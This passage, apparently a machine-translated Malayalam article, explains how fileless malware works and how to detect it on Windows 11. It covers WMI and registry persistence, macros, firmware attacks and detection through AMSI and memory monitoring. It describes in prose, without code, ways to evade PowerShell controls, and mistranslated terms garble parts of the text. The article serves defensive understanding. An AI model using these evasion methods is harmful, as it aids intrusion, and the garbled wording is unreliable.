Windows 11-ൽ അപകടകരമായ ഫയലില്ലാത്ത മാൽവെയർ എങ്ങനെ കണ്ടെത്താം

¿അപകടകരമായ ഫയലില്ലാത്ത മാൽവെയർ എങ്ങനെ കണ്ടെത്താം? ഫയലില്ലാത്ത ആക്രമണ പ്രവർത്തനം ഗണ്യമായി വളർന്നു, കാര്യങ്ങൾ കൂടുതൽ വഷളാക്കുന്നു, വിൻഡോസ് 11 ഇതിൽ നിന്ന് മുക്തമല്ല.ഈ സമീപനം ഡിസ്കിനെ മറികടന്ന് മെമ്മറിയെയും നിയമാനുസൃത സിസ്റ്റം ഉപകരണങ്ങളെയും ആശ്രയിക്കുന്നു; അതുകൊണ്ടാണ് സിഗ്നേച്ചർ അടിസ്ഥാനമാക്കിയുള്ള ആന്റിവൈറസ് പ്രോഗ്രാമുകൾ ബുദ്ധിമുട്ടുന്നത്. അത് കണ്ടെത്തുന്നതിനുള്ള ഒരു വിശ്വസനീയമായ മാർഗം നിങ്ങൾ അന്വേഷിക്കുകയാണെങ്കിൽ, ഉത്തരം സംയോജിപ്പിക്കുന്നതിലാണ് ടെലിമെട്രി, പെരുമാറ്റ വിശകലനം, വിൻഡോസ് നിയന്ത്രണങ്ങൾ.

നിലവിലെ ആവാസവ്യവസ്ഥയിൽ, പവർഷെൽ, ഡബ്ല്യുഎംഐ, അല്ലെങ്കിൽ എംഷ്ത എന്നിവ ദുരുപയോഗം ചെയ്യുന്ന കാമ്പെയ്‌നുകൾ മെമ്മറി കുത്തിവയ്പ്പുകൾ, ഡിസ്ക് "തൊടാതെ" സ്ഥിരത പുലർത്തൽ തുടങ്ങിയ കൂടുതൽ സങ്കീർണ്ണമായ സാങ്കേതിക വിദ്യകളുമായി സഹവർത്തിക്കുന്നു, ഫേംവെയർ ദുരുപയോഗങ്ങൾറാമിനുള്ളിൽ എല്ലാം സംഭവിക്കുമ്പോഴും ഭീഷണി ഭൂപടം, ആക്രമണ ഘട്ടങ്ങൾ, അവ എന്ത് സിഗ്നലുകൾ നൽകുന്നു എന്നിവ മനസ്സിലാക്കുക എന്നതാണ് പ്രധാനം.

ഫയലില്ലാത്ത മാൽവെയർ എന്താണ്, വിൻഡോസ് 11-ൽ ഇത് ഒരു ആശങ്കയായിരിക്കുന്നത് എന്തുകൊണ്ട്?

"ഫയൽ‌ലെസ്" ഭീഷണികളെക്കുറിച്ച് നമ്മൾ സംസാരിക്കുമ്പോൾ, നമ്മൾ സൂചിപ്പിക്കുന്നത് ക്ഷുദ്ര കോഡുകളെയാണ്, അത് പുതിയ എക്സിക്യൂട്ടബിളുകൾ നിക്ഷേപിക്കേണ്ടതില്ല. ഫയൽ സിസ്റ്റത്തിൽ പ്രവർത്തിക്കാൻ. ഇത് സാധാരണയായി പ്രവർത്തിക്കുന്ന പ്രക്രിയകളിലേക്ക് കുത്തിവയ്ക്കുകയും RAM-ൽ നടപ്പിലാക്കുകയും ചെയ്യുന്നു, മൈക്രോസോഫ്റ്റ് ഒപ്പിട്ട ഇന്റർപ്രെറ്ററുകളെയും ബൈനറികളെയും ആശ്രയിച്ച് (ഉദാ., പവർഷെൽ, WMI, rundll32, mshtaഇത് നിങ്ങളുടെ ഡാറ്റാബേസ് കുറയ്ക്കുകയും സംശയാസ്പദമായ ഫയലുകൾ മാത്രം തിരയുന്ന എഞ്ചിനുകളെ മറികടക്കാൻ നിങ്ങളെ അനുവദിക്കുകയും ചെയ്യുന്നു.

കമാൻഡുകൾ സമാരംഭിക്കുന്നതിന് ദുർബലതകൾ ചൂഷണം ചെയ്യുന്ന ഓഫീസ് ഡോക്യുമെന്റുകളോ PDF-കളോ പോലും ഈ പ്രതിഭാസത്തിന്റെ ഭാഗമായി കണക്കാക്കപ്പെടുന്നു, കാരണം മെമ്മറിയിൽ എക്സിക്യൂഷൻ സജീവമാക്കുക വിശകലനത്തിനായി ഉപയോഗപ്രദമായ ബൈനറികൾ അവശേഷിപ്പിക്കാതെ. ദുരുപയോഗം മാക്രോകളും ഡിഡിഇയും ഓഫീസിൽ, കോഡ് WinWord പോലുള്ള നിയമാനുസൃത പ്രക്രിയകളിൽ പ്രവർത്തിക്കുന്നതിനാൽ.

ആക്രമണകാരികൾ സോഷ്യൽ എഞ്ചിനീയറിംഗ് (ഫിഷിംഗ്, സ്പാം ലിങ്കുകൾ) സാങ്കേതിക കെണികളുമായി സംയോജിപ്പിക്കുന്നു: ഉപയോക്താവിന്റെ ക്ലിക്ക് ഒരു ശൃംഖല ആരംഭിക്കുന്നു, അതിൽ ഒരു സ്ക്രിപ്റ്റ് മെമ്മറിയിലെ അന്തിമ പേലോഡ് ഡൗൺലോഡ് ചെയ്ത് എക്സിക്യൂട്ട് ചെയ്യുന്നു, ഒരു സൂചന പോലും അവശേഷിപ്പിക്കാതെ ഡിസ്കിൽ. ഡാറ്റ മോഷണം മുതൽ റാൻസംവെയർ എക്സിക്യൂഷൻ വരെ, നിശബ്ദമായ ലാറ്ററൽ മൂവ്മെന്റ് വരെ ലക്ഷ്യങ്ങൾ ഉണ്ട്.

സിസ്റ്റത്തിലെ കാൽപ്പാടുകൾ അനുസരിച്ചുള്ള ടൈപ്പോളജികൾ: 'ശുദ്ധം' മുതൽ സങ്കരയിനം വരെ

ആശയക്കുഴപ്പമുണ്ടാക്കുന്ന ആശയങ്ങൾ ഒഴിവാക്കാൻ, ഫയൽ സിസ്റ്റവുമായുള്ള ഇടപെടലിന്റെ അളവ് അനുസരിച്ച് ഭീഷണികളെ വേർതിരിക്കുന്നത് സഹായകരമാണ്. ഈ വർഗ്ഗീകരണം വ്യക്തമാക്കുന്നു എന്താണ് നിലനിൽക്കുന്നത്, കോഡ് എവിടെയാണ് താമസിക്കുന്നത്, അത് എന്ത് അടയാളങ്ങളാണ് അവശേഷിപ്പിക്കുന്നത്?.

ടൈപ്പ് I: ഫയൽ ആക്റ്റിവിറ്റി ഇല്ല

പൂർണ്ണമായും ഫയലില്ലാത്ത മാൽവെയർ ഡിസ്കിലേക്ക് ഒന്നും എഴുതുന്നില്ല. ഒരു ക്ലാസിക് ഉദാഹരണം ചൂഷണം ചെയ്യുക എന്നതാണ് നെറ്റ്‌വർക്ക് ദുർബലത (പഴയകാലത്തെ EternalBlue വെക്റ്റർ പോലെ) കേർണൽ മെമ്മറിയിൽ (DoublePulsar പോലുള്ളവ) വസിക്കുന്ന ഒരു ബാക്ക്‌ഡോർ നടപ്പിലാക്കാൻ. ഇവിടെ, എല്ലാം RAM-ൽ സംഭവിക്കുന്നു, ഫയൽ സിസ്റ്റത്തിൽ ആർട്ടിഫാക്‌റ്റുകളൊന്നുമില്ല.

മറ്റൊരു ഓപ്ഷൻ മലിനമാക്കുക എന്നതാണ് ഫേംവെയർ ഘടകങ്ങളുടെ എണ്ണം: BIOS/UEFI, നെറ്റ്‌വർക്ക് അഡാപ്റ്ററുകൾ, USB പെരിഫറലുകൾ (BadUSB-തരം ടെക്നിക്കുകൾ) അല്ലെങ്കിൽ CPU സബ്സിസ്റ്റങ്ങൾ പോലും. പുനരാരംഭിക്കുമ്പോഴും വീണ്ടും ഇൻസ്റ്റാൾ ചെയ്യുമ്പോഴും അവ നിലനിൽക്കുന്നു, അധിക ബുദ്ധിമുട്ടുകൾക്കൊപ്പം ഫേംവെയർ പരിശോധിക്കുന്ന ഉൽപ്പന്നങ്ങൾ കുറവാണ്.ഇവ സങ്കീർണ്ണമായ ആക്രമണങ്ങളാണ്, അത്ര ഇടയ്ക്കിടെ സംഭവിക്കാറില്ല, പക്ഷേ അവയുടെ രഹസ്യസ്വഭാവവും ഈടുതലും കാരണം അപകടകരമാണ്.

തരം II: പരോക്ഷ ആർക്കൈവിംഗ് പ്രവർത്തനം

ഇവിടെ, മാൽവെയർ സ്വന്തം എക്സിക്യൂട്ടബിൾ "വിടുന്നില്ല", മറിച്ച് അടിസ്ഥാനപരമായി ഫയലുകളായി സൂക്ഷിച്ചിരിക്കുന്ന സിസ്റ്റം-നിയന്ത്രിത കണ്ടെയ്‌നറുകൾ ഉപയോഗിക്കുന്നു. ഉദാഹരണത്തിന്, പ്ലാന്റ് ചെയ്യുന്ന ബാക്ക്‌ഡോറുകൾ പവർഷെൽ കമാൻഡുകൾ WMI റിപ്പോസിറ്ററിയിൽ ഇവന്റ് ഫിൽട്ടറുകൾ ഉപയോഗിച്ച് അതിന്റെ എക്സിക്യൂഷൻ ട്രിഗർ ചെയ്യുന്നു. ബൈനറികൾ ഉപേക്ഷിക്കാതെ കമാൻഡ് ലൈനിൽ നിന്ന് ഇത് ഇൻസ്റ്റാൾ ചെയ്യാൻ കഴിയും, എന്നാൽ WMI റിപ്പോസിറ്ററി ഡിസ്കിൽ ഒരു നിയമാനുസൃത ഡാറ്റാബേസായി നിലനിൽക്കുന്നു, ഇത് സിസ്റ്റത്തെ ബാധിക്കാതെ വൃത്തിയാക്കാൻ പ്രയാസമാക്കുന്നു.

പ്രായോഗിക കാഴ്ചപ്പാടിൽ അവ ഫയലില്ലാത്തതായി കണക്കാക്കപ്പെടുന്നു, കാരണം ആ കണ്ടെയ്നർ (WMI, രജിസ്ട്രി, മുതലായവ) ഇത് ഒരു ക്ലാസിക് കണ്ടെത്താവുന്ന എക്സിക്യൂട്ടബിൾ അല്ല. അതിന്റെ വൃത്തിയാക്കൽ നിസ്സാരമല്ല. ഫലം: "പരമ്പരാഗത" അടയാളങ്ങളൊന്നുമില്ലാതെ രഹസ്യമായി തുടരുക.

തരം III: പ്രവർത്തിക്കാൻ ഫയലുകൾ ആവശ്യമാണ്

ചില കേസുകൾ ഒരു 'ഫയലില്ലാത്ത' സ്ഥിരോത്സാഹം ഒരു ലോജിക്കൽ തലത്തിൽ, അവർക്ക് ഒരു ഫയൽ അധിഷ്ഠിത ട്രിഗർ ആവശ്യമാണ്. ഒരു സാധാരണ ഉദാഹരണമാണ് കോവ്റ്റർ: ഇത് ഒരു റാൻഡം എക്സ്റ്റൻഷനു വേണ്ടി ഒരു ഷെൽ ക്രിയ രജിസ്റ്റർ ചെയ്യുന്നു; ആ എക്സ്റ്റൻഷനുള്ള ഒരു ഫയൽ തുറക്കുമ്പോൾ, mshta.exe ഉപയോഗിക്കുന്ന ഒരു ചെറിയ സ്ക്രിപ്റ്റ് സമാരംഭിക്കുന്നു, അത് രജിസ്ട്രിയിൽ നിന്നുള്ള മാലിഷ്യസ് സ്ട്രിംഗ് പുനർനിർമ്മിക്കുന്നു.

റാൻഡം എക്സ്റ്റൻഷനുകളുള്ള ഈ "ബെയ്റ്റ്" ഫയലുകളിൽ വിശകലനം ചെയ്യാവുന്ന പേലോഡ് അടങ്ങിയിട്ടില്ല എന്നതാണ് തന്ത്രം, കൂടാതെ കോഡിന്റെ ഭൂരിഭാഗവും ഇതിൽ വസിക്കുന്നു രജിസ്ട്രേഷൻ (മറ്റൊരു കണ്ടെയ്നർ). അതുകൊണ്ടാണ് അവയെ ഫയലില്ലാത്ത ഇംപാക്റ്റ് ആയി തരംതിരിച്ചിരിക്കുന്നത്, കർശനമായി പറഞ്ഞാൽ അവ ഒന്നോ അതിലധികമോ ഡിസ്ക് ആർട്ടിഫാക്റ്റുകളെ ഒരു ട്രിഗറായി ആശ്രയിക്കുന്നുണ്ടെങ്കിലും.

അണുബാധയുടെ വെക്റ്ററുകളും 'ഹോസ്റ്റുകളും': അത് എവിടെ പ്രവേശിക്കുന്നു, എവിടെ ഒളിക്കുന്നു

കണ്ടെത്തൽ മെച്ചപ്പെടുത്തുന്നതിന്, അണുബാധയുടെ പ്രവേശന പോയിന്റും ഹോസ്റ്റും മാപ്പ് ചെയ്യേണ്ടത് അത്യാവശ്യമാണ്. ഈ കാഴ്ചപ്പാട് രൂപകൽപ്പന ചെയ്യാൻ സഹായിക്കുന്നു പ്രത്യേക നിയന്ത്രണങ്ങൾ ഉചിതമായ ടെലിമെട്രിക്ക് മുൻഗണന നൽകുക.

ചൂഷണം

• ഫയൽ അധിഷ്ഠിതം (ടൈപ്പ് III): ഡോക്യുമെന്റുകൾ, എക്സിക്യൂട്ടബിളുകൾ, ലെഗസി ഫ്ലാഷ്/ജാവ ഫയലുകൾ, അല്ലെങ്കിൽ എൽഎൻകെ ഫയലുകൾ എന്നിവ ബ്രൗസറിനെയോ അവ പ്രോസസ്സ് ചെയ്യുന്ന എഞ്ചിനെയോ ചൂഷണം ചെയ്ത് ഷെൽകോഡ് മെമ്മറിയിലേക്ക് ലോഡ് ചെയ്യാൻ കഴിയും. ആദ്യത്തെ വെക്റ്റർ ഒരു ഫയലാണ്, പക്ഷേ പേലോഡ് റാമിലേക്ക് സഞ്ചരിക്കുന്നു.
• നെറ്റ്‌വർക്ക് അധിഷ്ഠിതം (ടൈപ്പ് I): ഒരു ദുർബലതയെ ചൂഷണം ചെയ്യുന്ന ഒരു പാക്കേജ് (ഉദാ. SMB-യിൽ) ഉപയോക്തൃഭൂമിയിലോ കേർണലിലോ എക്സിക്യൂഷൻ നേടുന്നു. WannaCry ഈ സമീപനത്തെ ജനപ്രിയമാക്കി. നേരിട്ടുള്ള മെമ്മറി ലോഡ് പുതിയ ഫയൽ ഇല്ലാതെ.

ഹാർഡ്വെയർ

• ഉപകരണങ്ങൾ (ടൈപ്പ് I): ഡിസ്ക് അല്ലെങ്കിൽ നെറ്റ്‌വർക്ക് കാർഡ് ഫേംവെയറിൽ മാറ്റം വരുത്താനും കോഡ് നൽകാനും കഴിയും. പരിശോധിക്കാൻ പ്രയാസമാണ്, കൂടാതെ OS-ന് പുറത്ത് നിലനിൽക്കുന്നു.
• സിപിയു, മാനേജ്മെന്റ് സബ്സിസ്റ്റങ്ങൾ (ടൈപ്പ് I): ഇന്റലിന്റെ ME/AMT പോലുള്ള സാങ്കേതികവിദ്യകൾ OS-ന് പുറത്തുള്ള നെറ്റ്‌വർക്കിംഗും നിർവ്വഹണവുംവളരെ താഴ്ന്ന തലത്തിൽ ആക്രമണം നടത്താനും സ്റ്റെൽത്ത് സാധ്യത വളരെ കൂടുതലായിരിക്കാനും ഇതിന് കഴിയും.
• USB (ടൈപ്പ് I): ഒരു കീബോർഡോ എൻഐസിയോ ആയി ആൾമാറാട്ടം നടത്താനും കമാൻഡുകൾ സമാരംഭിക്കാനോ ട്രാഫിക് റീഡയറക്‌ട് ചെയ്യാനോ ഒരു യുഎസ്ബി ഡ്രൈവ് റീപ്രോഗ്രാം ചെയ്യാൻ BadUSB നിങ്ങളെ അനുവദിക്കുന്നു.
• BIOS / UEFI (ടൈപ്പ് I): വിൻഡോസ് ബൂട്ട് ചെയ്യുന്നതിന് മുമ്പ് പ്രവർത്തിക്കുന്ന ക്ഷുദ്രകരമായ ഫേംവെയർ റീപ്രോഗ്രാമിംഗ് (മെബ്രോമി പോലുള്ള കേസുകൾ).
• ഹൈപ്പർവൈസർ (ടൈപ്പ് I): OS-ന് കീഴിൽ അതിന്റെ സാന്നിധ്യം മറയ്ക്കാൻ ഒരു മിനി-ഹൈപ്പർവൈസർ നടപ്പിലാക്കുന്നു. അപൂർവ്വമാണ്, പക്ഷേ ഹൈപ്പർവൈസർ റൂട്ട്കിറ്റുകളുടെ രൂപത്തിൽ ഇതിനകം തന്നെ നിരീക്ഷിക്കപ്പെട്ടിട്ടുണ്ട്.

വധശിക്ഷയും കുത്തിവയ്പ്പും

• ഫയൽ അധിഷ്ഠിതം (തരം III): EXE/DLL/LNK അല്ലെങ്കിൽ നിയമാനുസൃത പ്രക്രിയകളിലേക്ക് കുത്തിവയ്പ്പുകൾ ആരംഭിക്കുന്ന ഷെഡ്യൂൾ ചെയ്ത ജോലികൾ.
• മാക്രോകൾ (ടൈപ്പ് III): ഓഫീസിലെ VBA-യ്ക്ക് വഞ്ചനയിലൂടെ ഉപയോക്താവിന്റെ സമ്മതത്തോടെ പൂർണ്ണ റാൻസംവെയർ ഉൾപ്പെടെയുള്ള പേലോഡുകൾ ഡീകോഡ് ചെയ്യാനും എക്സിക്യൂട്ട് ചെയ്യാനും കഴിയും.
• സ്ക്രിപ്റ്റുകൾ (ടൈപ്പ് II): പവർഷെൽ, വിബിസ്ക്രിപ്റ്റ് അല്ലെങ്കിൽ ജെസ്ക്രിപ്റ്റ് ഫയൽ, കമാൻഡ് ലൈൻ, സേവനങ്ങൾ, രജിസ്ട്രേഷൻ അല്ലെങ്കിൽ WMIആക്രമണകാരിക്ക് ഡിസ്കിൽ തൊടാതെ തന്നെ ഒരു റിമോട്ട് സെഷനിൽ സ്ക്രിപ്റ്റ് ടൈപ്പ് ചെയ്യാൻ കഴിയും.
• ബൂട്ട് റെക്കോർഡ് (MBR/ബൂട്ട്) (ടൈപ്പ് II): പെറ്റ്യ പോലുള്ള കുടുംബങ്ങൾ സ്റ്റാർട്ടപ്പിൽ തന്നെ നിയന്ത്രണം ഏറ്റെടുക്കുന്നതിനായി ബൂട്ട് സെക്ടറിനെ ഓവർറൈറ്റ് ചെയ്യുന്നു. ഇത് ഫയൽ സിസ്റ്റത്തിന് പുറത്താണ്, പക്ഷേ OS-ലും അത് പുനഃസ്ഥാപിക്കാൻ കഴിയുന്ന ആധുനിക പരിഹാരങ്ങളിലും ഇത് ആക്‌സസ് ചെയ്യാവുന്നതാണ്.

ഫയലില്ലാത്ത ആക്രമണങ്ങൾ എങ്ങനെ പ്രവർത്തിക്കുന്നു: ഘട്ടങ്ങളും സിഗ്നലുകളും

എക്സിക്യൂട്ടബിൾ ഫയലുകൾ അവശേഷിപ്പിക്കുന്നില്ലെങ്കിലും, കാമ്പെയ്‌നുകൾ ഘട്ടം ഘട്ടമായുള്ള യുക്തി പിന്തുടരുന്നു. അവയെ മനസ്സിലാക്കുന്നത് നിരീക്ഷിക്കാൻ അനുവദിക്കുന്നു. സംഭവങ്ങളും പ്രക്രിയകൾ തമ്മിലുള്ള ബന്ധങ്ങളും അത് ഒരു അടയാളം അവശേഷിപ്പിക്കുന്നു.

• പ്രാരംഭ ആക്‌സസ്ലിങ്കുകൾ അല്ലെങ്കിൽ അറ്റാച്ചുമെന്റുകൾ, അപഹരിക്കപ്പെട്ട വെബ്‌സൈറ്റുകൾ, അല്ലെങ്കിൽ മോഷ്ടിച്ച ക്രെഡൻഷ്യലുകൾ എന്നിവ ഉപയോഗിച്ചുള്ള ഫിഷിംഗ് ആക്രമണങ്ങൾ. പല ശൃംഖലകളും ഒരു കമാൻഡ് ട്രിഗർ ചെയ്യുന്ന ഒരു ഓഫീസ് ഡോക്യുമെന്റിൽ നിന്നാണ് ആരംഭിക്കുന്നത്. പവർഷെൽ.
• സ്ഥിരോത്സാഹം: WMI വഴിയുള്ള ബാക്ക്‌ഡോറുകൾ (ഫിൽട്ടറുകളും സബ്‌സ്‌ക്രിപ്‌ഷനുകളും), രജിസ്ട്രി എക്സിക്യൂഷൻ കീകൾ അല്ലെങ്കിൽ പുതിയ ക്ഷുദ്ര ഫയലില്ലാതെ സ്ക്രിപ്റ്റുകൾ വീണ്ടും സമാരംഭിക്കുന്ന ഷെഡ്യൂൾ ചെയ്ത ടാസ്‌ക്കുകൾ.
• പുറംതള്ളൽവിവരങ്ങൾ ശേഖരിച്ചുകഴിഞ്ഞാൽ, ട്രാഫിക് മിക്സ് ചെയ്യുന്നതിനായി വിശ്വസനീയമായ പ്രക്രിയകൾ (ബ്രൗസറുകൾ, പവർഷെൽ, ബിറ്റ്സ്അഡ്മിൻ) ഉപയോഗിച്ച് അത് നെറ്റ്‌വർക്കിന് പുറത്തേക്ക് അയയ്ക്കുന്നു.

ഈ രീതി പ്രത്യേകിച്ച് വഞ്ചനാപരമാണ് കാരണം ആക്രമണ സൂചകങ്ങൾ അവ സാധാരണത്വത്തിൽ മറഞ്ഞിരിക്കുന്നു: കമാൻഡ്-ലൈൻ ആർഗ്യുമെന്റുകൾ, പ്രോസസ് ചെയിനിംഗ്, അസാധാരണമായ ഔട്ട്ബൗണ്ട് കണക്ഷനുകൾ, അല്ലെങ്കിൽ ഇഞ്ചക്ഷൻ API-കളിലേക്കുള്ള ആക്‌സസ്.

സാധാരണ സാങ്കേതിക വിദ്യകൾ: മെമ്മറിയിൽ നിന്ന് റെക്കോർഡിംഗിലേക്ക്

അഭിനേതാക്കൾ വിവിധ മേഖലകളെ ആശ്രയിക്കുന്നു രീതികൾ സ്റ്റെൽത്ത് ഒപ്റ്റിമൈസ് ചെയ്യാൻ സഹായിക്കുന്നു. ഫലപ്രദമായ കണ്ടെത്തൽ സജീവമാക്കുന്നതിന് ഏറ്റവും സാധാരണമായവ അറിയുന്നത് സഹായകരമാണ്.

• ഓർമ്മയിലുള്ള താമസക്കാരൻ: സജീവമാക്കലിനായി കാത്തിരിക്കുന്ന ഒരു വിശ്വസനീയ പ്രക്രിയയുടെ ഇടത്തിലേക്ക് പേലോഡുകൾ ലോഡ് ചെയ്യുന്നു. റൂട്ട്കിറ്റുകളും ഹുക്കുകളും കേർണലിൽ, അവ മറയ്ക്കലിന്റെ അളവ് ഉയർത്തുന്നു.
• രജിസ്ട്രിയിൽ സ്ഥിരതഎൻക്രിപ്റ്റ് ചെയ്ത ബ്ലോഗുകൾ കീകളിൽ സംരക്ഷിച്ച് ഒരു നിയമാനുസൃത ലോഞ്ചറിൽ (mshta, rundll32, wscript) നിന്ന് അവയെ വീണ്ടും ജലാംശം ചെയ്യുക. എഫെമെറൽ ഇൻസ്റ്റാളറിന് അതിന്റെ കാൽപ്പാടുകൾ കുറയ്ക്കുന്നതിന് സ്വയം നശിപ്പിക്കാൻ കഴിയും.
• ക്രെഡൻഷ്യൽ ഫിഷിംഗ്മോഷ്ടിച്ച ഉപയോക്തൃനാമങ്ങളും പാസ്‌വേഡുകളും ഉപയോഗിച്ച്, ആക്രമണകാരി റിമോട്ട് ഷെല്ലുകളും പ്ലാന്റുകളും പ്രവർത്തിപ്പിക്കുന്നു. നിശബ്ദ ആക്‌സസ് രജിസ്ട്രിയിലോ WMIയിലോ.
• 'ഫയൽലെസ്' റാൻസംവെയർഎൻക്രിപ്ഷനും C2 ആശയവിനിമയവും റാമിൽ നിന്ന് ക്രമീകരിച്ചിരിക്കുന്നതിനാൽ, കേടുപാടുകൾ ദൃശ്യമാകുന്നതുവരെ കണ്ടെത്താനുള്ള അവസരങ്ങൾ കുറയ്ക്കുന്നു.
• പ്രവർത്തന കിറ്റുകൾ: ഉപയോക്താവ് ക്ലിക്കുചെയ്‌തതിനുശേഷം അപകടസാധ്യതകൾ കണ്ടെത്തുകയും മെമ്മറി-മാത്രം പേലോഡുകൾ വിന്യസിക്കുകയും ചെയ്യുന്ന ഓട്ടോമേറ്റഡ് ശൃംഖലകൾ.
• കോഡുള്ള പ്രമാണങ്ങൾ: എക്സിക്യൂട്ടബിളുകൾ ഡിസ്കിൽ സേവ് ചെയ്യാതെ കമാൻഡുകൾ ട്രിഗർ ചെയ്യുന്ന DDE പോലുള്ള മാക്രോകളും മെക്കാനിസങ്ങളും.

വ്യവസായ പഠനങ്ങൾ ഇതിനകം തന്നെ ശ്രദ്ധേയമായ ഉന്നതികൾ കാണിച്ചിട്ടുണ്ട്: 2018 ലെ ഒരു കാലയളവിൽ, ഒരു 90% ത്തിലധികം വർദ്ധനവ് സ്ക്രിപ്റ്റ് അധിഷ്ഠിത, പവർഷെൽ ചെയിൻ ആക്രമണങ്ങളിൽ, വെക്റ്റർ അതിന്റെ ഫലപ്രാപ്തിക്ക് മുൻഗണന നൽകുന്നു എന്നതിന്റെ സൂചന.

കമ്പനികൾക്കും വിതരണക്കാർക്കും വെല്ലുവിളി: തടയൽ മാത്രം പോരാ എന്നത് എന്തുകൊണ്ട്?

പവർഷെൽ പ്രവർത്തനരഹിതമാക്കുകയോ മാക്രോകൾ എന്നെന്നേക്കുമായി നിരോധിക്കുകയോ ചെയ്യുന്നത് പ്രലോഭിപ്പിക്കുന്നതായിരിക്കും, പക്ഷേ നീ ഓപ്പറേഷൻ തകർക്കും.പവർഷെൽ ആധുനിക ഭരണത്തിന്റെ ഒരു സ്തംഭമാണ്, ബിസിനസ്സിൽ ഓഫീസ് അത്യാവശ്യമാണ്; അന്ധമായി തടയുന്നത് പലപ്പോഴും പ്രായോഗികമല്ല.

കൂടാതെ, അടിസ്ഥാന നിയന്ത്രണങ്ങളെ മറികടക്കാൻ വഴികളുണ്ട്: DLL-കളിലൂടെയും rundll32-ലൂടെയും PowerShell പ്രവർത്തിപ്പിക്കുക, EXE-കളിലേക്ക് സ്ക്രിപ്റ്റുകൾ പാക്കേജ് ചെയ്യുക, പവർഷെല്ലിന്റെ സ്വന്തം പകർപ്പ് കൊണ്ടുവരിക. അല്ലെങ്കിൽ ഇമേജുകളിൽ സ്ക്രിപ്റ്റുകൾ ഒളിപ്പിച്ചു മെമ്മറിയിലേക്ക് എക്സ്ട്രാക്റ്റ് ചെയ്യുക പോലും ചെയ്യാം. അതിനാൽ, ഉപകരണങ്ങളുടെ നിലനിൽപ്പ് നിഷേധിക്കുന്നതിൽ മാത്രം പ്രതിരോധം അധിഷ്ഠിതമാകാൻ കഴിയില്ല.

മറ്റൊരു സാധാരണ തെറ്റ്, മുഴുവൻ തീരുമാനവും ക്ലൗഡിന് കൈമാറുക എന്നതാണ്: സെർവറിൽ നിന്നുള്ള പ്രതികരണത്തിനായി ഏജന്റ് കാത്തിരിക്കേണ്ടിവന്നാൽ, നിങ്ങൾക്ക് തത്സമയ പ്രതിരോധം നഷ്ടപ്പെടുംവിവരങ്ങൾ സമ്പുഷ്ടമാക്കാൻ ടെലിമെട്രി ഡാറ്റ അപ്‌ലോഡ് ചെയ്യാൻ കഴിയും, പക്ഷേ ലഘൂകരണം അവസാന പോയിന്റിൽ സംഭവിക്കണം..

Windows 11-ൽ ഫയലില്ലാത്ത മാൽവെയർ എങ്ങനെ കണ്ടെത്താം: ടെലിമെട്രിയും പെരുമാറ്റവും

വിജയ തന്ത്രം പ്രക്രിയകളും മെമ്മറിയും നിരീക്ഷിക്കുകഫയലുകളല്ല. ഒരു ഫയൽ സ്വീകരിക്കുന്ന രൂപങ്ങളേക്കാൾ ദോഷകരമായ പെരുമാറ്റങ്ങൾ കൂടുതൽ സ്ഥിരതയുള്ളതാണ്, ഇത് അവയെ പ്രതിരോധ എഞ്ചിനുകൾക്ക് അനുയോജ്യമാക്കുന്നു.

• AMSI (ആന്റിമാൽവെയർ സ്കാൻ ഇന്റർഫേസ്)മെമ്മറിയിൽ ചലനാത്മകമായി നിർമ്മിച്ചിരിക്കുമ്പോൾ പോലും ഇത് പവർഷെൽ, വിബിസ്ക്രിപ്റ്റ് അല്ലെങ്കിൽ ജെസ്ക്രിപ്റ്റ് സ്ക്രിപ്റ്റുകളെ തടസ്സപ്പെടുത്തുന്നു. നടപ്പിലാക്കുന്നതിന് മുമ്പ് അവ്യക്തമായ സ്ട്രിംഗുകൾ ക്യാപ്ചർ ചെയ്യുന്നതിന് മികച്ചതാണ്.
• പ്രക്രിയ നിരീക്ഷണം: ആരംഭം/അവസാനം, PID, മാതാപിതാക്കളും കുട്ടികളും, വഴികൾ, കമാൻഡ് ലൈനുകൾ മുഴുവൻ കഥയും മനസ്സിലാക്കാൻ ഹാഷുകളും, കൂടാതെ എക്സിക്യൂഷൻ ട്രീകളും.
• മെമ്മറി വിശകലനം: ഡിസ്കിൽ തൊടാതെ തന്നെ കുത്തിവയ്പ്പുകൾ, പ്രതിഫലിപ്പിക്കുന്ന അല്ലെങ്കിൽ PE ലോഡുകൾ കണ്ടെത്തൽ, അസാധാരണമായ എക്സിക്യൂട്ടബിൾ മേഖലകളുടെ അവലോകനം.
• സ്റ്റാർട്ടർ സെക്ടർ സംരക്ഷണം: കൃത്രിമത്വം ഉണ്ടായാൽ MBR/EFI യുടെ നിയന്ത്രണവും പുനഃസ്ഥാപനവും.

മൈക്രോസോഫ്റ്റ് ഇക്കോസിസ്റ്റത്തിൽ, ഡിഫൻഡർ ഫോർ എൻഡ്‌പോയിന്റ് AMSI-യെ സംയോജിപ്പിക്കുന്നു, പെരുമാറ്റ നിരീക്ഷണംപുതിയതോ അവ്യക്തമായതോ ആയ വകഭേദങ്ങൾക്കെതിരെ കണ്ടെത്തലുകൾ അളക്കാൻ മെമ്മറി സ്കാനിംഗും ക്ലൗഡ് അധിഷ്ഠിത മെഷീൻ ലേണിംഗും ഉപയോഗിക്കുന്നു. മറ്റ് വെണ്ടർമാരും കേർണൽ-റെസിഡന്റ് എഞ്ചിനുകളിൽ സമാനമായ സമീപനങ്ങളാണ് ഉപയോഗിക്കുന്നത്.

പരസ്പര ബന്ധത്തിന്റെ യഥാർത്ഥ ഉദാഹരണം: ഡോക്യുമെന്റിൽ നിന്ന് പവർഷെല്ലിലേക്ക്

ഔട്ട്‌ലുക്ക് ഒരു അറ്റാച്ചുമെന്റ് ഡൗൺലോഡ് ചെയ്യുന്നതും, വേഡ് ഡോക്യുമെന്റ് തുറക്കുന്നതും, സജീവ ഉള്ളടക്കം പ്രവർത്തനക്ഷമമാക്കുന്നതും, സംശയാസ്പദമായ പാരാമീറ്ററുകൾ ഉപയോഗിച്ച് പവർഷെൽ സമാരംഭിക്കുന്നതുമായ ഒരു ശൃംഖല സങ്കൽപ്പിക്കുക. ശരിയായ ടെലിമെട്രി കാണിക്കുന്നത് കമാൻഡ് ലൈൻ (ഉദാ. എക്സിക്യൂഷൻ പോളിസി ബൈപാസ്, മറഞ്ഞിരിക്കുന്ന വിൻഡോ), വിശ്വസനീയമല്ലാത്ത ഒരു ഡൊമെയ്‌നിലേക്ക് കണക്റ്റുചെയ്‌ത് AppData-യിൽ സ്വയം ഇൻസ്റ്റാൾ ചെയ്യുന്ന ഒരു ചൈൽഡ് പ്രോസസ്സ് സൃഷ്‌ടിക്കുന്നു.

